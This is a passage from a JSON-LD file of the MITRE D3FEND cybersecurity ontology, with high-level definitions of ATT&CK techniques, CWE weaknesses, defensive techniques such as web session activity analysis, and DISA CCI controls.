      "@id": "d3f:DS0033",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "A storage resource (typically a folder or drive) made available from one host to others using network protocols, such as Server Message Block (SMB) or Network File System (NFS)",
      "rdfs:comment": "This data source captures events relating to shared network resources and therefore has no direct mappings to digital artifacts.",
      "rdfs:label": "Network Share (ATT&CK DS)"
    },
    {
      "@id": "d3f:T1059.006",
      "@type": "owl:Class",
      "d3f:attack-id": "T1059.006",
      "d3f:definition": "Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the <code>python.exe</code> interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.(Citation: Zscaler APT31 Covid-19 October 2020)",
      "rdfs:label": "Python",
      "rdfs:subClassOf": {
        "@id": "d3f:T1059"
      }
    },
    {
      "@id": "d3f:CWE-1245",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1245",
      "d3f:definition": "Faulty finite state machines (FSMs) in the hardware logic allow an attacker to put the system in an undefined state, to cause a denial of service (DoS) or gain privileges on the victim's system.",
      "rdfs:label": "Improper Finite State Machines (FSMs) in Hardware Logic",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-684"
      }
    },
    {
      "@id": "d3f:CWE-650",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-650",
      "d3f:definition": "The server contains a protection mechanism that assumes that any URI that is accessed using HTTP GET will not cause a state change to the associated resource. This might allow attackers to bypass intended access restrictions and conduct resource modification and deletion attacks, since some applications allow GET to modify state.",
      "rdfs:label": "Trusting HTTP Permission Methods on the Server Side",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-436"
      }
    },
    {
      "@id": "d3f:DS0017",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "A directive given to a computer program, acting as an interpreter of some kind, in order to perform a specific task",
      "rdfs:comment": "This data source captures events relating to commands and therefore has no direct mappings to digital artifacts.",
      "rdfs:label": "Command (ATT&CK DS)"
    },
    {
      "@id": "d3f:T1547.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1547.001",
      "d3f:definition": "Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the \"run keys\" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.",
      "d3f:may-modify": [
        {
          "@id": "d3f:SystemConfigurationInitDatabaseRecord"
        },
        {
          "@id": "d3f:UserStartupScriptFile"
        }
      ],
      "rdfs:label": "Registry Run Keys / Startup Folder",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1547"
        },
        {
          "@id": "_:N51746958ff054351b85aee58da174b23"
        },
        {
          "@id": "_:Nf56e3222c1c646509caf71845aad8a4b"
        }
      ]
    },
    {
      "@id": "_:N51746958ff054351b85aee58da174b23",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationInitDatabaseRecord"
      }
    },
    {
      "@id": "_:Nf56e3222c1c646509caf71845aad8a4b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserStartupScriptFile"
      }
    },
    {
      "@id": "d3f:CCI-002716_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:FileHashing"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements cryptographic mechanisms to detect unauthorized changes to software.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002716"
    },
    {
      "@id": "d3f:ShellCommand",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A shell command is a directive to some kind of command-line interface, such as a shell.",
      "d3f:may-create": {
        "@id": "d3f:Process"
      },
      "d3f:may-execute": {
        "@id": "d3f:ExecutableFile"
      },
      "d3f:recorded-in": {
        "@id": "d3f:CommandHistoryLog"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:Command_(computing)"
      },
      "rdfs:label": "Shell Command",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Command"
        },
        {
          "@id": "_:Nf90ce0fd0b70437e933d7337269f222e"
        },
        {
          "@id": "_:N6431119e9fcc4e7fb77b0042937c8621"
        },
        {
          "@id": "_:N2f1b48b296484b55876260f84dda5afc"
        }
      ]
    },
    {
      "@id": "_:Nf90ce0fd0b70437e933d7337269f222e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-create"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "_:N6431119e9fcc4e7fb77b0042937c8621",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-execute"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableFile"
      }
    },
    {
      "@id": "_:N2f1b48b296484b55876260f84dda5afc",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:recorded-in"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CommandHistoryLog"
      }
    },
    {
      "@id": "d3f:WebSessionActivityAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:WebSessionActivityAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:WebResourceAccess"
      },
      "d3f:d3fend-id": "D3-WSAA",
      "d3f:definition": "Monitoring changes in user web session behavior by comparing current web session activity to a baseline behavior profile or a catalog of predetermined malicious behavior.",
      "d3f:kb-article": "## How it works\nUser web session data is collected over a period of time to create a user behavior profile. Data collected includes clicks made on a website, average time between clicks, filling out web forms, order in which pages are viewed, and downloading files. Current user web session behavior is then compared against the use behavior profile to identify anomalies and a likelihood that the current user web session is malicious. Current user web session behavior can also be compared to predetermined known malicious behavior profiles that are developed through analysis of malware in run time at a threat research facility.\n\n## Considerations\n* Potential for false positives from anomalies that are not associated with malicious activity.\n* Attackers may not differentiate their web session activity enough to trigger an alert.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-HostIntrusionPreventionSystemUsingSoftwareAndUserBehaviorAnalysis_SophosLtd"
        },
        {
          "@id": "d3f:Reference-SystemAndMethodForDetectionOfAChangeInBehaviorInTheUseOfAWebsiteThroughVectorVelocityAnalysis_SilverTailSystems"
        },
        {
          "@id": "d3f:Reference-SystemAndMethodForNetworkSecurityIncludingDetectionOfAttacksThroughPartnerWebsites_EMCIPHoldingCoLLC"
        },
        {
          "@id": "d3f:Reference-SystemAndMethodThereofForIdentifyingAndRespondingToSecurityIncidentsBasedOnPreemptiveForensics_PaloAltoNetworksInc"
        }
      ],
      "rdfs:label": "Web Session Activity Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserBehaviorAnalysis"
        },
        {
          "@id": "_:N78ef85ee089641feb9d9008ba5317a0e"
        }
      ]
    },
    {
      "@id": "_:N78ef85ee089641feb9d9008ba5317a0e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WebResourceAccess"
      }
    },
    {
      "@id": "d3f:T1553.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1553.004",
      "d3f:definition": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.(Citation: Wikipedia Root Certificate) Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.",
      "d3f:modifies": {
        "@id": "d3f:CertificateTrustStore"
      },
      "rdfs:label": "Install Root Certificate",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1553"
        },
        {
          "@id": "_:Nc1713b04fe794b08a82c97ff89f7ee2a"
        }
      ]
    },
    {
      "@id": "_:Nc1713b04fe794b08a82c97ff89f7ee2a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CertificateTrustStore"
      }
    },
    {
      "@id": "d3f:RD-0005.03",
      "@type": "owl:Class",
      "d3f:attack-id": "RD-0005.03",
      "d3f:definition": "Kinetic capabilities physically strike space or ground elements. In space, direct-ascent systems launch from Earth to intercept a satellite on orbit; co-orbital systems maneuver in space to approach and impact a target. On the ground, kinetic attacks can target stations or support infrastructure. These actions are generally easier to detect and attribute and often produce persistent, hazardous debris in orbit, especially at higher altitudes, making them strategically escalatory. Actors developing or accessing such capabilities gain credible coercive power but at significant political and operational cost.",
      "rdfs:label": "Kinetic Physical ASAT - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/RD-0005/03/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:RD-0005"
      },
      "skos:prefLabel": "Kinetic Physical ASAT"
    },
    {
      "@id": "d3f:T1053.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1053.003",
      "d3f:definition": "Adversaries may abuse the <code>cron</code> utility to perform task scheduling for initial or recurring execution of malicious code.(Citation: 20 macOS Common Tools and Techniques) The <code>cron</code> utility is a time-based job scheduler for Unix-like operating systems.  The <code> crontab</code> file contains the schedule of cron entries to be run and the specified times for execution. Any <code>crontab</code> files are stored in operating system-specific file paths.",
      "rdfs:label": "Cron",
      "rdfs:subClassOf": {
        "@id": "d3f:T1053"
      }
    },
    {
      "@id": "d3f:LinuxKillArgumentSIGKILL",
      "@type": "owl:Class",
      "d3f:definition": "Send SIGKILL signal to a process.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/kill.2.html"
      },
      "rdfs:label": "Linux Kill Argument SIGKILL",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPITerminateProcess"
      }
    },
    {
      "@id": "d3f:T1204.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1204.002",
      "d3f:definition": "An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.",
      "d3f:executes": {
        "@id": "d3f:ExecutableFile"
      },
      "rdfs:label": "Malicious File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1204"
        },
        {
          "@id": "_:N0b90454106b34aa39aa02765e37f5677"
        }
      ]
    },
    {
      "@id": "_:N0b90454106b34aa39aa02765e37f5677",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:executes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableFile"
      }
    },
    {
      "@id": "d3f:T1004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1004",
      "d3f:definition": "Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in <code>HKLM\\Software\\[Wow6432Node\\]Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\</code> and <code>HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\</code> are used to manage additional helper programs and functionalities that support Winlogon. (Citation: Cylance Reg Persistence Sept 2013)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1547.004",
      "rdfs:label": "Winlogon Helper DLL",
      "rdfs:seeAlso": {
        "@id": "d3f:T1547.004"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:CWE-57",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-57",
      "d3f:definition": "The product contains protection mechanisms to restrict access to 'realdir/filename', but it constructs pathnames using external input in the form of 'fakedir/../realdir/filename' that are not handled by those mechanisms. This allows attackers to perform unauthorized actions against the targeted file.",
      "rdfs:label": "Path Equivalence: 'fakedir/../realdir/filename'",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-41"
      }
    },
    {
      "@id": "d3f:T1409",
      "@type": "owl:Class",
      "d3f:attack-id": "T1409",
      "d3f:definition": "Adversaries may try to access and collect application data resident on the device. Adversaries often target popular applications, such as Facebook, WeChat, and Gmail.(Citation: SWB Exodus March 2019)",
      "rdfs:label": "Stored Application Data - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCollectionTechnique"
      },
      "skos:prefLabel": "Stored Application Data"
    },
    {
      "@id": "d3f:Transformer-XL",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-TX",
      "d3f:definition": "Transformer-XL is a transformer architecture that introduces the notion of recurrence to the deep self-attention network. Instead of computing the hidden states from scratch for each new segment, Transformer-XL reuses the hidden states obtained in previous segments.",
      "d3f:kb-article": "## References\nTransformer-XL. (n.d.). Papers with Code. [Link](https://paperswithcode.com/method/transformer-xl)",
      "rdfs:label": "Transformer-XL",
      "rdfs:subClassOf": {
        "@id": "d3f:Transformer-basedLearning"
      }
    },
    {
      "@id": "d3f:GetOpenWindows",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "rdfs:label": "Get Open Windows",
      "rdfs:subClassOf": {
        "@id": "d3f:SystemCall"
      }
    },
    {
      "@id": "d3f:UserAccountPasswordChangeEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a user account's password is modified, typically by the user or an administrator.",
      "rdfs:label": "User Account Password Change Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserAccountEvent"
        },
        {
          "@id": "_:N95362717c3d84242b8f651d51646e4ec"
        },
        {
          "@id": "_:N42949f80c2794440a3a7bf74b768cc7d"
        }
      ]
    },
    {
      "@id": "_:N95362717c3d84242b8f651d51646e4ec",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Credential"
      }
    },
    {
      "@id": "_:N42949f80c2794440a3a7bf74b768cc7d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccountCreationEvent"
      }
    },
    {
      "@id": "d3f:T1114.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1114.001",
      "d3f:definition": "Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.",
      "d3f:reads": {
        "@id": "d3f:Email"
      },
      "rdfs:label": "Local Email Collection",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1114"
        },
        {
          "@id": "_:N923feaa4197045bb9beb8e46fa5eb804"
        }
      ]
    },
    {
      "@id": "_:N923feaa4197045bb9beb8e46fa5eb804",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:reads"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Email"
      }
    },
    {
      "@id": "d3f:T1663",
      "@type": "owl:Class",
      "d3f:attack-id": "T1663",
      "d3f:definition": "Adversaries may use legitimate remote access software, such as `VNC`, `TeamViewer`, `AirDroid`, `AirMirror`, etc., to establish an interactive command and control channel to target mobile devices.",
      "rdfs:label": "Remote Access Software - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCommandAndControlTechnique"
      },
      "skos:prefLabel": "Remote Access Software"
    },
    {
      "@id": "d3f:T1405",
      "@type": "owl:Class",
      "d3f:attack-id": "T1405",
      "d3f:definition": "A malicious app or other attack vector could be used to exploit vulnerabilities in code running within the Trusted Execution Environment (TEE) (Citation: Thomas-TrustZone). The adversary could then obtain privileges held by the TEE potentially including the ability to access cryptographic keys or other sensitive data (Citation: QualcommKeyMaster). Escalated operating system privileges may be first required in order to have the ability to attack the TEE (Citation: EkbergTEE). If not, privileges within the TEE can potentially be used to exploit the operating system (Citation: laginimaineb-TEE).",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been deprecated.",
      "rdfs:label": "Exploit TEE Vulnerability - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileCredentialAccessTechnique"
        },
        {
          "@id": "d3f:ATTACKMobilePrivilegeEscalationTechnique"
        }
      ],
      "skos:prefLabel": "Exploit TEE Vulnerability"
    },
    {
      "@id": "d3f:ApplicationPerformanceMonitoring",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ApplicationPerformanceMonitoring"
      ],
      "d3f:d3fend-id": "D3-APM",
      "d3f:definition": "Monitoring the count and duration of the application or program cycle.",
      "d3f:kb-article": "## How it works\nKeeping track of the controller cycle time by logging it, setting alarms, and correlating with other events. Changes to cycle time can be indicative of injecting new logic, deleting logic, or system failures.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-SecurePLCCodingPracticesTop20List"
      },
      "d3f:monitors": [
        {
          "@id": "d3f:ApplicationScanTime"
        },
        {
          "@id": "d3f:SystemApplicationCycleCount"
        }
      ],
      "rdfs:label": "Application Performance Monitoring",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PlatformMonitoring"
        },
        {
          "@id": "_:N0a85c4c5041542359f549620a91f1aa9"
        },
        {
          "@id": "_:Nf73102bfe59d40c98a131f0b6f56d190"
        }
      ]
    },
    {
      "@id": "_:N0a85c4c5041542359f549620a91f1aa9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationScanTime"
      }
    },
    {
      "@id": "_:Nf73102bfe59d40c98a131f0b6f56d190",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemApplicationCycleCount"
      }
    },
    {
      "@id": "d3f:CCI-001376_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system uniquely identifies source domains for information transfer.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:DomainTrustPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-22T00:00:00"
      },
      "rdfs:label": "CCI-001376"
    },
    {
      "@id": "d3f:T1176",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1176",
      "d3f:definition": "Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.(Citation: Wikipedia Browser Extension)(Citation: Chrome Extensions Definition)",
      "d3f:modifies": {
        "@id": "d3f:BrowserExtension"
      },
      "rdfs:label": "Software Extensions",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "_:N6061ac69b9324e74a695bb8a2f4c334d"
        }
      ]
    },
    {
      "@id": "_:N6061ac69b9324e74a695bb8a2f4c334d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BrowserExtension"
      }
    },
    {
      "@id": "d3f:jams",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x jams y: The entity x deliberately introduces interfering energy that degrades, disrupts, blocks, or masks the information-bearing capability of the target y.",
      "rdfs:label": "jams",
      "rdfs:subPropertyOf": {
        "@id": "d3f:impairs"
      }
    },
    {
      "@id": "d3f:GuidelineReference",
      "@type": "owl:Class",
      "d3f:pref-label": "Guideline",
      "rdfs:label": "Guideline Reference",
      "rdfs:subClassOf": {
        "@id": "d3f:PolicyReference"
      }
    },
    {
      "@id": "d3f:T1584.006",
      "@type": "owl:Class",
      "d3f:attack-id": "T1584.006",
      "d3f:definition": "Adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, SendGrid, etc. Adversaries may try to take ownership of a legitimate user's access to a web service and use that web service as infrastructure in support of cyber operations. Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)), [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567), or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Recorded Future Turla Infra 2020) Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them. Additionally, leveraging compromised web-based email services may allow adversaries to leverage the trust associated with legitimate domains.",
      "rdfs:label": "Web Services",
      "rdfs:subClassOf": {
        "@id": "d3f:T1584"
      }
    },
    {
      "@id": "d3f:CCI-002746_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system provides a manual override capability for input validation of organization-defined inputs.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:DatabaseQueryStringAnalysis"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002746"
    },
    {
      "@id": "d3f:derived-from",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x derived-from y: The entity x is derived from or based on the value of y.",
      "rdfs:label": "derived-from",
      "rdfs:subPropertyOf": {
        "@id": "d3f:depends-on"
      }
    },
    {
      "@id": "d3f:LinuxCreat",
      "@type": "owl:Class",
      "d3f:definition": "Equivalent to calling Linux Open with flags equal to O_CREAT|O_WRONLY|O_TRUNC.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/creat.2.html"
      },
      "rdfs:label": "Linux Creat",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPICreateFile"
      }
    },
    {
      "@id": "d3f:CCI-002394_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system protects the availability of resources by allocating organization-defined resources based on priority, quota, and/or organization-defined security safeguards.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:SystemConfigurationPermissions"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002394"
    },
    {
      "@id": "d3f:T1640",
      "@type": "owl:Class",
      "d3f:attack-id": "T1640",
      "d3f:definition": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: credentials changed) to remove access to accounts.",
      "rdfs:label": "Account Access Removal - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileImpactTechnique"
      },
      "skos:prefLabel": "Account Access Removal"
    },
    {
      "@id": "d3f:Reference-CAR-2021-05-010%3ACreateLocalAdminAccountsUsingNetExe_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2021-05-010/"
      },
      "d3f:kb-abstract": "This search looks for the creation of local administrator accounts using net.exe.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2021-05-010: Create local admin accounts using net exe",
      "rdfs:label": "Reference - CAR-2021-05-010: Create local admin accounts using net exe - MITRE"
    },
    {
      "@id": "d3f:RealtimeClock",
      "@type": "owl:Class",
      "d3f:definition": "A real-time clock (RTC) is an electronic device (most often in the form of an integrated circuit) that measures the passage of time.",
      "d3f:synonym": "RTC",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/resource/Real-time_clock"
      },
      "rdfs:label": "Real-time Clock",
      "rdfs:subClassOf": {
        "@id": "d3f:HardwareClock"
      }
    },
    {
      "@id": "d3f:CWE-1278",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1278",
      "d3f:definition": "Information stored in hardware may be recovered by an attacker with the capability to capture and analyze images of the integrated circuit using techniques such as scanning electron microscopy.",
      "rdfs:label": "Missing Protection Against Hardware Reverse Engineering Using Integrated Circuit (IC) Imaging Techniques",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-693"
      }
    },
    {
      "@id": "d3f:MicrosoftWordDOCMFile",
      "@type": [
        "owl:NamedIndividual",
        "d3f:DocumentFile"
      ],
      "rdfs:label": "Microsoft Word DOCM File"
    },
    {
      "@id": "d3f:instructs",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x instructs y: A subject x delivers machine instructions to object y.",
      "rdfs:label": "instructs",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:InboundInternetWebTraffic",
      "@type": "owl:Class",
      "d3f:definition": "Inbound internet web traffic is network traffic that is: (a) on an incoming connection initiated from a host outside the network to a host within a network, and (b) using a standard web protocol.",
      "rdfs:label": "Inbound Internet Web Traffic",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Internetworking"
        },
        {
          "@id": "https://schema.ocsf.io/objects/http_response"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:InboundInternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:ExternalThreatModelThing",
      "@type": "owl:Class",
      "rdfs:label": "External Threat Model Thing",
      "rdfs:subClassOf": {
        "@id": "d3f:ExternalThing"
      }
    },
    {
      "@id": "d3f:CWE-390",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-390",
      "d3f:definition": "The product detects a specific error, but takes no actions to handle the error.",
      "rdfs:label": "Detection of Error Condition Without Action",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-755"
      }
    },
    {
      "@id": "d3f:CCI-002631_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system issues a warning, audits the command execution, or prevents the execution of the command when organization-defined unauthorized operating system commands are detected.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:ScriptExecutionAnalysis"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002631"
    },
    {
      "@id": "d3f:FileRenamingEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event representing the renaming of a file, modifying its identifier within the file system while retaining its content and metadata.",
      "rdfs:label": "File Renaming Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FileEvent"
        },
        {
          "@id": "_:Nb045dc3df86c429cab715026b5a8adc9"
        },
        {
          "@id": "_:N42259e8bf50e423ab1f71f922bf09a41"
        }
      ]
    },
    {
      "@id": "_:Nb045dc3df86c429cab715026b5a8adc9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileAccessEvent"
      }
    },
    {
      "@id": "_:N42259e8bf50e423ab1f71f922bf09a41",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileCreationEvent"
      }
    },
    {
      "@id": "d3f:CWE-705",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-705",
      "d3f:definition": "The product does not properly return control flow to the proper location after it has completed a task or detected an unusual condition.",
      "rdfs:label": "Incorrect Control Flow Scoping",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-691"
      }
    },
    {
      "@id": "d3f:CWE-197",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-197",
      "d3f:definition": "Truncation errors occur when a primitive is cast to a primitive of a smaller size and data is lost in the conversion.",
      "rdfs:label": "Numeric Truncation Error",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-681"
      }
    },
    {
      "@id": "d3f:T1552.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:SystemConfigurationDatabase"
      },
      "d3f:attack-id": "T1552.002",
      "d3f:definition": "Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.",
      "rdfs:label": "Credentials in Registry",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1552"
        },
        {
          "@id": "_:N58e172a8865d41f8b753134b42b1b3e1"
        }
      ]
    },
    {
      "@id": "_:N58e172a8865d41f8b753134b42b1b3e1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
